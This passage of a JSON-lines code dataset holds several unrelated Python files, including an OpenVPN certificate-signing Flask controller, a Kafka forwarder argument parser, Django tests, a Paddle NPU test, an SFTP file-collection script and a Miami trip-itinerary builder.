child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-ca')\n child.expect(']:', timeout=30) # Country Name\n child.send('\\n')\n\n child.expect(']:') # State or Province Name\n child.sendline()\n\n child.expect(']:') # Locality Name\n child.sendline()\n\n child.expect(']:') # Organization Name\n child.sendline()\n\n child.expect(']:') # Organizational Unit Name\n child.sendline()\n\n child.expect(']:') # Common Name\n child.sendline('OpenVPN-CA')\n\n child.expect(']:') # Name\n child.sendline()\n\n child.expect(']:') # Email Address\n child.sendline()\n child.expect(os.linesep, timeout=30) # only one line feed works on Windows\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'ca.key') and is_file_valid(KEYS_PATH / 'ca.crt'):\n print('Succeeded to build CA key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build CA key')\n\n if not is_file_valid(KEYS_PATH / 'ta.key'):\n print('Start to build TA key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-ta')\n child.expect(LINE_END, timeout=30)\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'ta.key'):\n print('Succeeded to build TA key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build TA key')\n\n if not is_file_valid(KEYS_PATH / 'server.key') or not is_file_valid(KEYS_PATH / 'server.crt'):\n print('Start to build server key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-key-server server')\n child.expect(']:', timeout=30) # Country Name\n child.send('\\n')\n\n child.expect(']:') # State or Province Name\n child.sendline()\n\n child.expect(']:') # Locality Name\n child.sendline()\n\n child.expect(']:') # Organization Name\n child.sendline()\n\n child.expect(']:') # Organizational Unit Name\n child.sendline()\n\n child.expect(']:') # Common Name\n child.sendline('server')\n\n child.expect(']:') # Name\n child.sendline()\n\n child.expect(']:') # Email Address\n child.sendline()\n\n child.expect(']:') # A challenge password\n child.send('\\n') # don't know why only '\\n' works\n\n child.expect(']:') # An optional company name\n child.sendline()\n\n child.expect(r'\\[y/n\\]:')\n child.sendline('y')\n\n try:\n child.expect('\\[y/n\\]', timeout=2)\n except pexpect.exceptions.TIMEOUT:\n print('Signing certificate failed possibly due to repeated CSR requests')\n child.sendline('y')\n\n child.expect(LINE_END, timeout=30)\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'server.key') and is_file_valid(KEYS_PATH / 'server.crt'):\n print('Succeeded to build server key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build server key')\n\n if not is_file_valid(KEYS_PATH / 'dh2048.pem'):\n print('Start to build DH key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-dh')\n child.expect(LINE_END, timeout=600)\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'dh2048.pem'):\n print('Succeeded to build DH key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build DH key')\n\nif not 'thread' in globals():\n thread = build_keys()\n thread.daemon = True\n thread.start()\n\n@api.route('/csr')\nclass certificate_signing_request(Resource):\n @api.doc('certificate signing request')\n def post(self):\n \"\"\"\n Certificate signing request\n \"\"\"\n filename = None\n for name, file in request.files.items():\n if file.filename.endswith('.csr'):\n temp_id = str(ObjectId())\n filename = KEYS_PATH / (temp_id + '.csr')\n # file.save(str(filename))\n file.save(str(filename))\n break\n\n if filename:\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n if not is_file_valid(KEYS_PATH / 'ca.key'):\n return 'CA not found', 404\n\n cert_name = os.path.basename(filename).split('.')[0]\n child.sendline(LINE_BEGIN + 'sign-req {}'.format(cert_name))\n child.expect(r'\\[y/n\\]:')\n child.sendline('y')\n\n try:\n child.expect('\\[y/n\\]', timeout=2)\n except pexpect.exceptions.TIMEOUT:\n return 'Signing certificate failed possibly due to repeated CSR requests', 404\n child.sendline('y')\n\n child.expect(LINE_END)\n\n return send_from_directory(Path(os.getcwd()) / os.path.dirname(filename), cert_name + '.crt')\n return 'CSR request is invalid', 404\n\n@api.route('/ca')\nclass certificate_authority_request(Resource):\n @api.doc('certificate authority request')\n def get(self):\n \"\"\"\n Certificate authority request\n \"\"\"\n if not is_file_valid(KEYS_PATH / 'ca.key'):\n return 'CA not found', 404\n\n return send_from_directory(Path(os.getcwd()) / KEYS_PATH, 'ca.crt')\n","sub_path":"webrobot/app/main/controller/cert_controller.py","file_name":"cert_controller.py","file_ext":"py","file_size_in_byte":8911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371536436","text":"import configparser\nimport logging\nfrom os import getpid\nfrom pathlib import Path\nfrom socket import gethostname\n\nimport configargparse\n\n\nclass VersionArgParser(configargparse.ArgumentParser):\n def error(self, message: str):\n \"\"\"\n Override the default implementation so nothing gets printed to screen\n \"\"\"\n raise RuntimeError(\"Did not ask for --version\")\n\n def _print_message(self, message: str, file: None = None):\n \"\"\"\n Override the default implementation so nothing gets printed to screen\n \"\"\"\n raise RuntimeError(\"Did not ask for --version\")\n\n\ndef get_version() -> str:\n \"\"\"\n Gets the current version from the setup.cfg file\n \"\"\"\n config = configparser.ConfigParser()\n path = Path(__file__).parent.parent / \"setup.cfg\"\n config.read(path)\n return str(config[\"metadata\"][\"version\"])\n\n\ndef _print_version_if_requested():\n version_arg_parser = VersionArgParser()\n version_arg_parser.add_argument(\n \"--version\",\n required=True,\n action=\"store_true\",\n help=\"Print application version and exit\",\n env_var=\"VERSION\",\n )\n try:\n version_arg_parser.parse_args()\n print(get_version())\n exit()\n except RuntimeError:\n pass\n\n\ndef parse_args():\n _print_version_if_requested()\n\n parser = configargparse.ArgumentParser(\n description=\"Forwards EPICS PVs to Apache Kafka. Part of the ESS data streaming pipeline.\"\n )\n parser.add_argument(\n \"--version\",\n action=\"store_true\",\n help=\"Print application version and exit\",\n env_var=\"VERSION\",\n )\n parser.add_argument(\n \"--config-topic\",\n required=True,\n help=\" Kafka broker/topic to listen for commands\",\n type=str,\n env_var=\"CONFIG_TOPIC\",\n )\n parser.add_argument(\n \"--status-topic\",\n required=True,\n help=\" Kafka broker/topic to publish status updates on\",\n type=str,\n env_var=\"STATUS_TOPIC\",\n )\n parser.add_argument(\n \"--output-broker\",\n required=True,\n help=\" Kafka broker to forward data into\",\n type=str,\n env_var=\"OUTPUT_BROKER\",\n )\n parser.add_argument(\n \"--storage-topic\",\n required=False,\n help=\" Kafka broker/topic for storage of the \"\n \"last known forwarding details\",\n type=str,\n env_var=\"STORAGE_TOPIC\",\n )\n parser.add_argument(\n \"-s\",\n \"--skip-retrieval\",\n action=\"store_true\",\n help=\"Ignore the stored configuration on startup\",\n )\n parser.add_argument(\n \"--graylog-logger-address\",\n required=False,\n help=\" Log to Graylog\",\n type=str,\n env_var=\"GRAYLOG_LOGGER_ADDRESS\",\n )\n parser.add_argument(\n \"--grafana-carbon-address\",\n required=False,\n help=\" Address to the Grafana (Carbon) metrics server\",\n type=str,\n )\n parser.add_argument(\n \"--log-file\", required=False, help=\"Log filename\", type=str, env_var=\"LOG_FILE\"\n )\n parser.add_argument(\n \"-c\",\n \"--config-file\",\n required=False,\n is_config_file=True,\n help=\"Read configuration from an ini file\",\n env_var=\"CONFIG_FILE\",\n )\n parser.add_argument(\n \"--pv-update-period\",\n required=False,\n help=\"If set then PV value will be sent with this interval even if unchanged (units=milliseconds)\",\n env_var=\"PV_UPDATE_PERIOD\",\n type=int,\n )\n parser.add_argument(\n \"--service-id\",\n required=False,\n help='Identifier for this particular instance of the Forwarder, defaults to \"Forwarder..',\n default=f\"Forwarder.{gethostname()}.{getpid()}\",\n env_var=\"SERVICE_ID\",\n type=str,\n )\n parser.add_argument(\n \"--fake-pv-period\",\n required=False,\n help=\"Period for random generated PV updates when channel_provider_type is set to 'fake' (units=milliseconds)\",\n env_var=\"FAKE_PV_PERIOD\",\n type=int,\n default=1000,\n )\n log_choice_to_enum = {\n \"Trace\": logging.DEBUG,\n \"Debug\": logging.DEBUG,\n \"Warning\": logging.WARNING,\n \"Error\": logging.ERROR,\n \"Critical\": logging.CRITICAL,\n }\n parser.add_argument(\n \"-v\",\n \"--verbosity\",\n required=False,\n help=\"Set logging level\",\n choices=log_choice_to_enum.keys(),\n default=\"Error\",\n env_var=\"VERBOSITY\",\n )\n optargs = parser.parse_args()\n optargs.verbosity = log_choice_to_enum[optargs.verbosity]\n return optargs\n","sub_path":"forwarder/parse_commandline_args.py","file_name":"parse_commandline_args.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"303652643","text":"from gec_backend.controller import UserManager, SenManager, TypeManager\nfrom django.test import TestCase\n\n\n# Create your tests here.\n# !!! includes test for SenManager and TypeManager\nclass TestSenManager(TestCase):\n\n def setUp(self):\n err, self.user = UserManager.createUser(\"test1\", \"test\")\n self.assertEquals(err, \"succeed\")\n\n def testAddSen(self):\n \"\"\"\n test if addSentences function could run correctly\n \"\"\"\n print(\"======= test add\")\n err2, newsen = SenManager.addSentences(self.user.id, 'org sentence', 'correct sentence',\n ['spell', 'case', 'verb', 'replace'])\n self.assertEquals(err2, \"succeed\")\n for type in list(newsen.error_type.all()):\n print(type.type)\n err3, newsen = SenManager.addSentences(self.user.id, 'org sentence1', 'correct sentence1',\n ['spell', 'case', 'verb'])\n err4, lists = SenManager.getSentencesByUserID(self.user.id)\n self.assertEqual(err4, 'succeed')\n for l in lists:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n\n err0, type = TypeManager.getTypeByName('spell', self.user.id)\n self.assertEqual(err0, 'succeed')\n print('newuser==============')\n err0, newuser = UserManager.createUser('ttt', 'ppp')\n err3, newsen = SenManager.addSentences(newuser.id, 'org sentence222', 'correct sentence222',\n ['spell', 'case', 'verb'])\n err, type = TypeManager.getTypeByName('spell', newuser.id)\n err5, resList = SenManager.getSentencesByTypeName('replace', self.user.id)\n self.assertEqual(err5, 'succeed')\n for l in resList:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n err0, type = TypeManager.getTypeByName('spell', newuser.id)\n\n print(\"===\")\n err = TypeManager.updateType('spell', self.user.id, 10)\n err, lists = TypeManager.getTypeCntRank(self.user.id)\n for l in lists:\n print(l.type, l.error_counts)\n print(\"+++\")\n err, typelist = TypeManager.getTypeBySentence(newsen.id)\n for l in typelist:\n print(l.type)\n def testDel(self):\n print(\"======= test delete\")\n err2, newsen = SenManager.addSentences(self.user.id, 'org sentence', 'correct sentence',\n ['spell', 'case', 'verb', 'replace'])\n err3, newsen = SenManager.addSentences(self.user.id, 'org sentence1', 'correct sentence1',\n ['spell', 'case', 'verb'])\n\n err0, newuser = UserManager.createUser('ttt', 'ppp')\n err3, newsen1 = SenManager.addSentences(newuser.id, 'org sentence1', 'correct sentence1',\n ['spell', 'case', 'verb'])\n self.assertNotEqual(newsen1.id, newsen.id)\n err3 = SenManager.delSentences(newsen.id)\n self.assertEqual(err3, 'succeed')\n err4, sen = SenManager.getSentencesByID(newsen.id)\n self.assertNotEqual(err4, 'succeed')\n err4, lists = SenManager.getSentencesByUserID(newuser.id)\n self.assertEqual(err4, 'succeed')\n for l in lists:\n print(l.user.userName, l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n\n err4, lists = SenManager.getSentencesByUserID(self.user.id)\n self.assertEqual(err4, 'succeed')\n for l in lists:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n err0, type = TypeManager.getTypeByName('case', self.user.id)\n print(\"++++\")\n err5, resList = SenManager.getSentencesByTypeName('case', self.user.id)\n self.assertEqual(err5, 'succeed')\n for l in resList:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n","sub_path":"gec_backend/test/testSentence.py","file_name":"testSentence.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"327401355","text":"# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1414172190.393\n_enable_loop = True\n_template_filename = 'C:\\\\DjangoMako\\\\ITILITY\\\\homepage\\\\templates/edit_location.html'\n_template_uri = 'edit_location.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = [u'content']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, u'base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n def content():\n return render_content(context._locals(__M_locals))\n form = context.get('form', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(u'\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer(u'\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def content():\n return render_content(context)\n form = context.get('form', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(u'\\n\\n

\\n

Edit Location:

\\n\\n \\n
\\n
\\n \\n \\n ')\n __M_writer(unicode( form ))\n __M_writer(u'\\n \\n
\\n \\n \\n Cancel\\n
\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"source_encoding\": \"ascii\", \"line_map\": {\"35\": 1, \"40\": 21, \"46\": 3, \"53\": 3, \"54\": 13, \"55\": 13, \"27\": 0, \"61\": 55}, \"uri\": \"edit_location.html\", \"filename\": \"C:\\\\DjangoMako\\\\ITILITY\\\\homepage\\\\templates/edit_location.html\"}\n__M_END_METADATA\n\"\"\"\n","sub_path":"homepage/cached_templates/templates/edit_location.html.py","file_name":"edit_location.html.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497157131","text":"from random import normalvariate, randint, randrange, sample\nfrom collections import namedtuple\nfrom datetime import date, timedelta\n\nListing = namedtuple('Listing',\n ['num_bedrooms', 'num_bathrooms', 'living_area', 'lat', 'lon',\n 'exterior_stories', 'pool', 'dwelling_type',\n 'list_date', 'list_price', 'close_date', 'close_price'])\n\n\nDWELLING_TYPES = {'single-family', 'townhouse', 'apartment', 'patio', 'loft'}\nPOOL_TYPES = {'private', 'community', 'none'}\n\n\ndef generate_datum():\n \"\"\"Returns a synthetic Listing in the Phoenix area\"\"\"\n num_bedrooms = randint(1, 4)\n num_bathrooms = randint(1, 4)\n living_area = randint(1e3, 5e3)\n list_date = random_date(date(1999, 1, 1), date(2015, 6, 1))\n list_price = randint(100e3, 500e3)\n lat = randint(33086, 33939) / float(1e3)\n lon = randint(-112649, -111437) / float(1e3)\n exterior_stories = randint(1, 3)\n pool = sample(POOL_TYPES, 1)[0]\n dwelling_type = sample(DWELLING_TYPES, 1)[0]\n is_closed = randrange(8) < 10 # 80% of listings close\n\n if is_closed:\n dom = randint(7, 180)\n list_to_close = normalvariate(0.03, 0.06)\n close_date = list_date + timedelta(days=dom)\n close_price = list_price * (1 - list_to_close)\n else:\n close_date = None\n close_price = None\n\n return Listing(num_bedrooms, num_bathrooms, living_area, lat, lon,\n exterior_stories, pool, dwelling_type,\n list_date, list_price, close_date, close_price)\n\n\ndef random_date(start_date, end_date):\n \"\"\"Returns a random date between start_date and end_date\"\"\"\n delta = end_date - start_date\n return start_date + timedelta(days=randrange(delta.days))","sub_path":"generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"153778841","text":"import scanpy as sc\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n#--------------------variable----------------------------\nfmt='tif'\n\nfd_in='./out/a02_modularity_01_anno'\nfd_out='./out/a03_plot-modu_01_pieplot'\n\nl_sample=['Ctrl', 'MethFix', 'RNAlater']\nl_cell=['Marginal', 'Intermediate', 'Basal','Spindle-Root'] \ncmap=['#F8766D', '#00BA38', '#619CFF', 'orange']\n\n#----------------------setup----------------------------\nPath(fd_out).mkdir(exist_ok=True, parents=True)\ndf_cnt=pd.read_csv(f'{fd_out}/cnt.csv')\n\n#--------------------function--------------------------\ndef load_adata(fname):\n\tadata=sc.read(fname)\n\tadata.obs['cell']=adata.obs['anno'].astype('str')\n\tadata.obs['cell']=adata.obs['cell'].replace(['Spindle-Root-1', 'Spindle-Root-2'], ['Spindle-Root', 'Spindle-Root'])\n\treturn adata\n\ndef count_cells(adata, l_cell, col='cell'):\n\t#count cell number in adata\n\tl_data=[]\n\tfor cell in l_cell:\n\t\tn=adata.obs.loc[adata.obs[col].str.contains(cell),:].shape[0]\n\t\tl_data.append((cell, n))\n\tdf=pd.DataFrame(l_data, columns=['cell', 'count'])\n\treturn df\n\ndef pieplot_sum(df, title, f_out, cmap=cmap, col_cnts='count', col_cells='cell', figsize=(10,10), labels=None):\n\t#labels=df[col_cells], if need cell label\n\ttotal=df[col_cnts].sum()\n\tfig, ax=plt.subplots(figsize=figsize)\n\tax.pie(df[col_cnts], colors=cmap, labels=labels, textprops={'fontsize':45}, autopct='%1.1f%%')\n\tax.set_title(title, fontsize=60, weight='medium')\n\tplt.tight_layout()\n\tplt.savefig(f_out, dpi=300)\n\tplt.close()\n\treturn\n\t\n#######################################################################\n##--------------------pie plot---------------------------\n#for sample in l_sample:\n#\t#1. set var\n#\tadata=load_adata(f'{fd_in}/{sample}.h5ad')\n#\t\n#\t#2. count\n#\tdf=count_cells(adata, l_cell)\n#\t\n#\t#3. pie plot\n#\tf_out=f'{fd_out}/pie_{sample}.{fmt}'\n#\tpieplot_sum(df, sample, f_out)\n#\t\n#\t#5. plot legend\n#\tfig, ax=plt.subplots(figsize=(10, 10))\n#\tsns.despine()\n#\tax=sns.barplot(x='cell', y='count', data=df, hue='cell', palette=cmap)\n#\tplt.ylim([0, 1000])\n#\tax.legend(frameon=False, prop={'size': 25})\n#\tplt.tight_layout()\n#\tplt.savefig(f'{fd_out}/legend.{fmt}', dpi=300)\n#\tplt.close()\n\t\n#-------------pieplot on counting data--------------------\nf_out=f'{fd_out}/pie_esimated.{fmt}'\ntitle='Esitmated %'\npieplot_sum(df_cnt, title, f_out)\n\n\n","sub_path":"a03_plot-modu_01_pieplot.py","file_name":"a03_plot-modu_01_pieplot.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"182430785","text":"import re\r\nimport csv\r\nimport sys\r\n\r\n\r\nfile = open(sys.argv[-2], \"r\")\r\ncontent = file.read()\r\nfile.close()\r\n\r\ntags = re.findall(r\"[\\s\\S]+?data-event-category=\\\"Job Link\\\"[\\s\\S]+?\", content) # finds rows in table\r\n\r\nvacancies = []\r\nfor i in tags:\r\n tmp = re.findall(r\">\\s*([^<>]*?\\w[^<>]*?)\\s*?<\" , i) # finds info in rows\r\n for i in range(3, len(tmp)): # in case of multiple locations for that vacancy\r\n vacancies.append([tmp[0], tmp[1], tmp[2], tmp[i]])\r\n\r\nwith open(sys.argv[-1], 'w', newline='') as csvfile:\r\n spamwriter = csv.writer(csvfile, delimiter=',')\r\n spamwriter.writerow(['Job Title', 'Category', 'Status', 'Location'])\r\n for vacancy in vacancies:\r\n spamwriter.writerow([x.replace(\"&\", \"&\") for x in vacancy])\r\n\r\nprint(\"Done\")\r\n","sub_path":"Extractor.py","file_name":"Extractor.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"407570501","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\nimport unittest\nimport sys\n\nsys.path.append(\"..\")\nfrom op_test import OpTest\nimport paddle\nimport paddle.fluid as fluid\n\npaddle.enable_static()\n\n\ndef sigmoid_array(x):\n return 1 / (1 + np.exp(-x))\n\n\n@unittest.skipIf(\n not paddle.is_compiled_with_npu(), \"core is not compiled with NPU\"\n)\nclass TestLogLossOp(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = 'log_loss'\n self.place = paddle.NPUPlace(0)\n\n self.init_dtype()\n\n self.set_inputs()\n self.set_attrs()\n self.set_outputs()\n\n def set_inputs(self):\n samples_num = 100\n x = np.random.random((samples_num, 1)).astype(self.dtype)\n predicted = sigmoid_array(x)\n labels = np.random.randint(0, 2, (samples_num, 1)).astype(self.dtype)\n self.inputs = {'Predicted': predicted, 'Labels': labels}\n\n def set_attrs(self):\n epsilon = 1e-7\n self.attrs = {'epsilon': epsilon}\n\n def set_outputs(self):\n epsilon = self.attrs['epsilon']\n labels = self.inputs['Labels']\n predicted = self.inputs['Predicted']\n loss = -labels * np.log(predicted + epsilon) - (1 - labels) * np.log(\n 1 - predicted + epsilon\n )\n self.outputs = {'Loss': loss}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def init_dtype(self):\n self.dtype = np.float32\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad_with_place(self.place, ['Predicted'], 'Loss')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/paddle/fluid/tests/unittests/npu/test_log_loss_op_npu.py","file_name":"test_log_loss_op_npu.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"417764864","text":"import numpy as np\n\ndef atomshift(input_dict, **kwargs):\n \"\"\"\n Converts the atomshift input term string into a list of floats.\n \n The input_dict keys used by this function (which can be renamed using the \n function's keyword arguments):\n atomshift -- a string of space-delimited numbers. This function converts it\n to a list of floats.\n \n Argument:\n input_dict -- dictionary containing input parameter key-value pairs\n \n Keyword Arguments:\n atomshift -- replacement parameter key name for 'atomshift'\n \"\"\"\n #Set default keynames\n keynames = ['atomshift']\n for keyname in keynames:\n kwargs[keyname] = kwargs.get(keyname, keyname)\n \n #Give default values for terms\n input_dict[kwargs['atomshift']] = input_dict.get(kwargs['atomshift'], '0 0 0')\n \n #Convert into list of floats\n input_dict[kwargs['atomshift']] = list(np.array(input_dict[kwargs['atomshift']].strip().split(), dtype=float))","sub_path":"iprPy/input/atomshift.py","file_name":"atomshift.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"496124662","text":"import socket\nimport paramiko\nimport time\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\n\nfrom config import *\nfrom encrypt import *\n\n\nRETRY = []\nRETRY.append('cd SDN/host/ && sudo python3 encrypt.py')\n\n\ndef load_key():\n with open (Config.BASE_PATH + 'private.pem', 'rb') as f:\n priv_key = RSA.importKey(f.read())\n \n return priv_key\n\n\ndef ip_convert(ip):\n if ip == '172.26.17.121':\n ip = '1'\n elif ip == '172.26.17.122':\n ip = '2'\n elif ip == '172.26.17.124':\n ip = '4'\n elif ip == '172.26.17.125':\n ip = '5'\n elif ip == '172.26.17.126':\n ip = '6'\n elif ip == '172.26.17.127':\n ip = '7'\n elif ip == '172.26.17.128':\n ip = '8'\n elif ip == '172.26.17.129':\n ip = '9'\n elif ip == '172.26.17.130':\n ip = '10'\n elif ip == '172.26.17.131':\n ip = '11'\n elif ip == '172.26.17.132':\n ip = '12'\n\n return ip\n\n\ndef recv_file(host_ips):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n for ip in host_ips:\n ssh.connect(ip, username=Config.HOST_USERNAME, password=Config.HOST_PASSWORD)\n name = ip_convert(ip)\n sftp = ssh.open_sftp()\n sftp.get(Config.HOST_BASE_PATH + \"host_pi_\" + name + \".rules.enc\", Config.BASE_PATH + \"controller_pi_\" + name + \".rules.enc\")\n sftp.close()\n ssh.close()\n\n\ndef dec_files(priv_key, host_ips):\n retry_hosts = []\n for ip in host_ips:\n name = ip_convert(ip)\n enc_file = Config.BASE_PATH + \"controller_pi_\" + name + \".rules.enc\"\n rules_file = enc_file[:-4]\n with open(enc_file, 'rb') as enc_f, open(rules_file, 'w') as dec_f:\n while True:\n encrypted = enc_f.read(Config.CHUNK_SIZE)\n if encrypted == b'':\n break\n decrypted = priv_key.decrypt(encrypted)\n try:\n dec_f.write(decrypted.decode())\n except:\n retry_hosts.append(ip)\n dec_f.write(b'-error'.decode())\n break\n\n return retry_hosts\n\n\ndef retry(retry_hosts):\n send_key(retry_hosts, RETRY)\n priv_key = load_key()\n recv_file(retry_hosts)\n retry_hosts = dec_files(priv_key, retry_hosts)\n if retry_hosts:\n retry(retry_hosts)\n\n\ndef collect_all():\n print(\"=====loading key=====\")\n priv_key = load_key()\n print(\"=====receiving data=====\")\n recv_file(Config.HOST_IPS)\n print(\"=====decrypting data=====\")\n retry_hosts = dec_files(priv_key, Config.HOST_IPS)\n if retry_hosts:\n retry(retry_hosts)\n print(\"=====end program=====\")\n\n\nif __name__ == '__main__':\n collect_all()","sub_path":"IEEE-Access-Proactive-Firewall/controller/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"362498997","text":"\n#\n# Team 1\n# My Weekend in Miami\n#\n\nimport budget\nimport hotel_setup\nimport activities\nimport restaurant_setup\nimport db # Used to build temporary database\nimport os # Used to delete temporary database\n\n\"\"\"\n\nPURPOSE:\nModule that takes in the maximum amount a user wants to spend per person\non their weekend in Miami and outputs a weekend itinerary that satisfies these\nbudget constraints.\n\nThis module calls on the Budget, Hotel, Activties, and Meals modules. An\ninstance of each of these classes is a member attribute of each instance of\nthe Itinerary class.\n\n\n\"\"\"\n\n\nclass Itinerary:\n\n def __init__(self, maxbudget):\n \"\"\"\n Itinerary Constructor\n Parameter: maxbudget (int)\n maximum (per person) user is willing to spend on their vacation\n Return:\n Itinerary instance\n \"\"\"\n # Determine budget\n trip_budget = budget.Budget(maxbudget)\n\n # Initialize temporary database\n dbname = \"temporary.db\"\n db.create(dbname)\n db.parseLodging(dbname)\n db.parseEnt(dbname)\n db.parseRest(dbname)\n\n # Choose hotel\n hotel = hotel_setup.Hotel(dbname, trip_budget.accomodations, 1)\n hotel.pick_hotel()\n self.hotel = hotel\n\n # Choose entertainment\n ent = activities.Activities(trip_budget.activities, dbname)\n ent.pick_activities()\n self.ent = ent\n\n # Choose restaurants\n rest = restaurant_setup.Restaurant(dbname, 1, trip_budget.meals)\n restLst = rest.pick_restaurant()\n self.meals = restLst\n\n # Set expenses attributes\n self.hotel_exp = self.hotel.cost * 2\n self.ent_exp = (self.ent.friday_eve[8] + self.ent.saturday_mor[8] +\n self.ent.saturday_aft[8] + self.ent.saturday_eve[8] +\n self.ent.sunday_mor[8])\n self.meals_exp = (self.get_rest_price(self.meals[0][4]) +\n self.get_rest_price(self.meals[1][4]) +\n self.get_rest_price(self.meals[2][4]) +\n self.get_rest_price(self.meals[3][4]) +\n self.get_rest_price(self.meals[4][4]))\n self.total_exp = self.hotel_exp + self.ent_exp + self.meals_exp\n\n # Delete temporary database\n if os.path.exists(\"temporary.db\"):\n os.remove(\"temporary.db\")\n else:\n errMsg = \" -- Anamolous Behavior Warning -- \\n\"\n errMsg += \"Itinerary tried to remove temporary.db \"\n errMsg += \"but file does not exist.\\n\"\n raise Exception(errMsg)\n\n\n def get_rest_price(self, rest_price):\n if (rest_price == 1):\n return 10\n elif (rest_price == 2):\n return 25\n elif (rest_price == 3):\n return 50\n else:\n return 65\n\n\n def get_itinerary_str(self):\n output = f\"-- Itinerary -- \\n\\n\"\n output += f\"Hotel: {self.hotel.name}\\n\"\n output += f\" ${self.hotel.cost} per 